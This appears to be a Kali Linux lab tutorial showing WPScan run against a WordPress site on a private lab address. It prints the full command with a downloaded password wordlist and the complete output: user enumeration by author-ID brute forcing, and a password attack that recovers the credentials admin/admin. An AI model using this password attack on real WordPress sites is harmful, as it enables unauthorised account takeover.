WPScan is a WordPress vulnerability scanner. WPScan is found in the Kali desktop menu 03:Web Application Analysis>Web Vulnerability Scanners.
The following command runs password-attack to wordpress server(192.168.0.3/wordpress). –passwords option requires password file that contains a list of passwords to use during the password attack.
One of the easiest ways to prepare the password file is to use Openwall wordlists collection(https://download.openwall.net/). The following command uses the file named “password” as its list of passwords, which downloaded from /pub/wordlists/passwords directory.
kali@kali:~$ wpscan --url 192.168.0.3/wordpress --passwords ./password
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.6
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.0.3/wordpress/
[+] Started: Mon Apr 25 00:00:00 20xx
Interesting Finding(s):
[+] http://192.168.0.3/wordpress/
| Interesting Entry: Server: Apache/2.4.38 (Raspbian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.0.3/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://wordpress_ghost_scanner
| - https://wordpress_xmlrpc_dos
| - https://wordpress_xmlrpc_login
| - https://wordpress_pingback_access
[+] http://192.168.0.3/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.0.3/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.0.3/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4 identified (Latest, released on 2020-03-31).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.0.3/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.0.3/wordpress/, Match: 'WordPress 5.4'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups -: |=============================================|
[i] No Config Backups Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs -: |============================================|
[i] User(s) Identified:
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Wp Login against 1 user/s
Progress: |=================================================
[SUCCESS] - admin / admin
Progress: |===============================================================|
[i] Valid Combinations Found:
| Username: admin, Password: admin
[+] Finished: Mon Apr 25 00:00:00 20xx
[+] Requests Done: 2895
[+] Cached Requests: 5
[+] Data Sent: 1.42 MB
[+] Data Received: 16.047 MB
[+] Memory used: 132.027 MB
[+] Elapsed time: 00:02:43The log shows that wpscan found admin/admin account-password pair in 3 minutes.
Note: wpscan requires internet access to update its database. If the network is unreachable to the database server, wpscan aborted.
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.6
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
Scan Aborted: Unable to get https://data.wpscan.org/metadata.json.sha512 (Couldn't connect to server)